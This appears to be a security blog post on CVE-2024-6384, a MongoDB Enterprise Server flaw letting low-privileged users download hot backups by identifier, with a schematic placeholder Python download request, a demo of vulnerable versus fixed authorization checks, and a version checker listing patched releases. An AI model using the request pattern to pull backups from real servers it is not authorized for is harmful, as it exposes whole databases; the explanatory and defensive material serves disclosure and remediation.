In this post, we discuss CVE-2024-6384, a vulnerability in MongoDB Enterprise Server that allowed an authenticated user with insufficient privileges to download "hot" backup files if they obtained a backup's unique identifier. It has since been fixed, and it matters to any organization that runs MongoDB Enterprise Server.

We'll give an overview of the vulnerability, a simple code snippet that illustrates the exploit path, links to the original references documenting the issue, and what has been done to address it. Let's get started!

Vulnerability Details

CVE-2024-6384 affects MongoDB Enterprise Server v6.0 versions prior to 6.0.16, MongoDB Enterprise Server v7.0 versions prior to 7.0.11, and MongoDB Enterprise Server v7.3 versions prior to 7.3.3.

An authenticated user with insufficient privileges can download hot backup files if they obtain the unique identifier of a backup. Hot backup files are a copy of the live database files, so they contain whatever data the deployment holds and must only be readable by principals that are allowed to take and restore backups.

To illustrate the shape of the flaw, consider the following Python snippet. The host, path and token are placeholders, not a documented MongoDB interface:

import requests

# Placeholder values: the host, path and token stand in for whatever the
# backup-download interface and credentials are in a given deployment.
base_url = "http://your-mongodb-server.com:port/backup/download"
backup_id = "unique_backup_identifier_here"

# The caller authenticates with its own, low-privileged token ...
headers = {"Authorization": "Bearer your_access_token"}

# ... and the only thing that selects the backup is the identifier in the URL.
response = requests.get(f"{base_url}/{backup_id}", headers=headers, timeout=30)

if response.status_code == 200:
    with open("downloaded_backup_file", "wb") as f:
        f.write(response.content)
    print("Backup file downloaded successfully.")
else:
    print(f"Failed to download the backup file: HTTP {response.status_code}")

The snippet is schematic; it exists to show the shape of the flaw rather than a literal request. What matters is that the only thing selecting the backup is the identifier, and in the affected releases knowing that identifier was effectively treated as sufficient authorization for the download. A backup identifier is a lookup key, not a credential: it can leak through logs, shared terminals or a colleague's pasted command, so the server must check the caller's privileges on the download path itself, independently of whether that caller could have started the backup. That is the gap the fixed releases close.
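To make the authorization point concrete, here is an added illustration that is neither MongoDB's code nor the snippet above. It uses an in-memory stand-in for a server's backup registry: `download_vulnerable` reproduces the pre-fix logic, where a known identifier is all it takes, and `download_fixed` checks the caller's privilege and ownership before the identifier is consulted. The `User` and `BackupStore` classes, the role name "backup" and the sample file bytes are assumptions made for the example.

```python
import hmac
import secrets
from dataclasses import dataclass, field


@dataclass(frozen=True)
class User:
    name: str
    roles: frozenset  # assumed role names; "backup" marks an account allowed to take and fetch backups


@dataclass
class BackupStore:
    """Constructed in-memory stand-in for a server's hot-backup registry."""
    files: dict = field(default_factory=dict)  # backup_id -> (owner name, file bytes)

    def start_backup(self, user: User, content: bytes) -> str:
        # Starting a backup is privilege-gated in both variants; the id is unguessable.
        if "backup" not in user.roles:
            raise PermissionError(f"{user.name} may not start a backup")
        backup_id = secrets.token_hex(16)
        self.files[backup_id] = (user.name, content)
        return backup_id

    def _lookup(self, backup_id: str):
        # Constant-time comparison so the lookup does not leak valid ids via timing.
        for known_id, record in self.files.items():
            if hmac.compare_digest(known_id.encode(), backup_id.encode()):
                return record
        return None

    def download_vulnerable(self, user: User, backup_id: str) -> bytes:
        """Pre-fix shape of the bug: the identifier alone is treated as authorization."""
        record = self._lookup(backup_id)
        if record is None:
            raise KeyError("unknown backup id")
        _owner, content = record
        return content

    def download_fixed(self, user: User, backup_id: str) -> bytes:
        """Post-fix shape: the caller's privilege is checked before the id is consulted,
        so an unprivileged caller learns nothing, not even whether the id exists."""
        if "backup" not in user.roles:
            raise PermissionError(f"{user.name} may not download backups")
        record = self._lookup(backup_id)
        if record is None:
            raise KeyError("unknown backup id")
        owner, content = record
        # Tighter binding: only the principal that started the backup may fetch it,
        # so a leaked id is useless even to another backup-capable account.
        if owner != user.name:
            raise PermissionError("backup id belongs to a different principal")
        return content


def run_demo() -> dict:
    """Exercise both download paths with a constructed backup; returns what each allowed."""
    store = BackupStore()
    admin = User("backup_admin", frozenset({"backup"}))
    reader = User("app_reader", frozenset({"read"}))
    content = b"constructed sample backup bytes"
    backup_id = store.start_backup(admin, content)

    results = {}
    # The reader has obtained the id (a log line, a shared shell, a pasted command).
    results["vulnerable_reader_gets_file"] = store.download_vulnerable(reader, backup_id) == content
    try:
        store.download_fixed(reader, backup_id)
        results["fixed_reader_denied"] = False
    except PermissionError:
        results["fixed_reader_denied"] = True
    results["fixed_owner_gets_file"] = store.download_fixed(admin, backup_id) == content
    return results


if __name__ == "__main__":
    for check, ok in run_demo().items():
        print(f"{check}: {ok}")
```

Note the ordering in `download_fixed`: the privilege check runs before the lookup, so a caller without the role gets the same error whether or not the identifier is valid, and the identifier cannot be probed by an account that should never see backups at all.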

Original References

For the reader's convenience, we have included links to the original documentation and vulnerability reports available on reputable sources.

1. MongoDB's security advisory detailing the vulnerability: link
2. CVE detail page for CVE-2024-6384 from the National Vulnerability Database: link

How This Vulnerability Was Addressed

The MongoDB team has fixed this in newer releases of each affected branch. To safeguard your MongoDB Enterprise Server against unauthorized backup downloads by underprivileged users, upgrade to the following versions or newer:

MongoDB Enterprise Server v6.0.16 or later
MongoDB Enterprise Server v7.0.11 or later
MongoDB Enterprise Server v7.3.3 or later

MongoDB Community Server does not ship the hot backup feature and is not listed as affected. Keep up with the release notes and security advisories for the software you run; here, upgrading the server is the fix, and until that is done, treat backup identifiers as sensitive and limit who can read the logs and sessions in which they appear.
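As an added check that is not part of the original post or of MongoDB's tooling, the following Python decides from a buildInfo-style document whether a server falls inside the affected ranges given above. The `FIXED_IN` table encodes exactly those ranges; the sample documents are constructed for the example. In a live check the document would come from pymongo's `client.admin.command("buildInfo")`, which reports `version` and, on Enterprise builds, `"enterprise"` in `modules`.

```python
import re

# First fixed patch release of each branch the advisory names, keyed by (major, minor).
FIXED_IN = {
    (6, 0): (6, 0, 16),
    (7, 0): (7, 0, 11),
    (7, 3): (7, 3, 3),
}

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)")


def parse_version(version: str) -> tuple:
    """Turn '7.0.9' or '7.0.9-rc1' into (7, 0, 9); pre-release suffixes are ignored."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    return tuple(int(part) for part in m.groups())


def is_affected(build_info: dict) -> bool:
    """Decide from a buildInfo-style document whether a server is in the affected ranges.

    Hot backup is an Enterprise feature, so a build without the "enterprise"
    module is reported as not affected. Branches the advisory does not name
    are also reported as not affected by this check; that is a modelling
    choice for the example, not a statement about those branches.
    """
    if "enterprise" not in build_info.get("modules", []):
        return False
    major, minor, patch = parse_version(build_info["version"])
    fixed = FIXED_IN.get((major, minor))
    if fixed is None:
        return False
    return (major, minor, patch) < fixed


# Constructed sample documents. In a live check the document would come from
# pymongo's client.admin.command("buildInfo"), which reports "version" and
# "modules" (containing "enterprise" on Enterprise builds).
SAMPLES = [
    {"version": "7.0.9", "modules": ["enterprise"]},   # below 7.0.11: affected
    {"version": "7.0.11", "modules": ["enterprise"]},  # first fixed 7.0 release
    {"version": "6.0.15", "modules": ["enterprise"]},  # below 6.0.16: affected
    {"version": "7.3.3", "modules": ["enterprise"]},   # first fixed 7.3 release
    {"version": "7.0.9", "modules": []},               # Community: no hot backup
]


def run_checks(samples=SAMPLES) -> list:
    """Return (version, edition, affected) for each sample document."""
    return [
        (
            doc["version"],
            "enterprise" if "enterprise" in doc.get("modules", []) else "community",
            is_affected(doc),
        )
        for doc in samples
    ]


if __name__ == "__main__":
    for version, edition, affected in run_checks():
        print(f"{version:8} {edition:10} {'AFFECTED' if affected else 'ok'}")
```

The comparison is on the parsed tuple rather than on the string, so "7.0.9" correctly sorts below "7.0.11"; a string comparison would get that wrong.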

Conclusion

CVE-2024-6384 was a serious vulnerability in MongoDB Enterprise Server that allowed underprivileged users to potentially access sensitive hot backup files. By upgrading the server to the appropriate patched versions, organizations can effectively address this issue and keep their confidential data secure from unauthorized access.

Timeline

Published on: 08/13/2024 15:15:18 UTC
Last modified on: 08/13/2024 17:11:53 UTC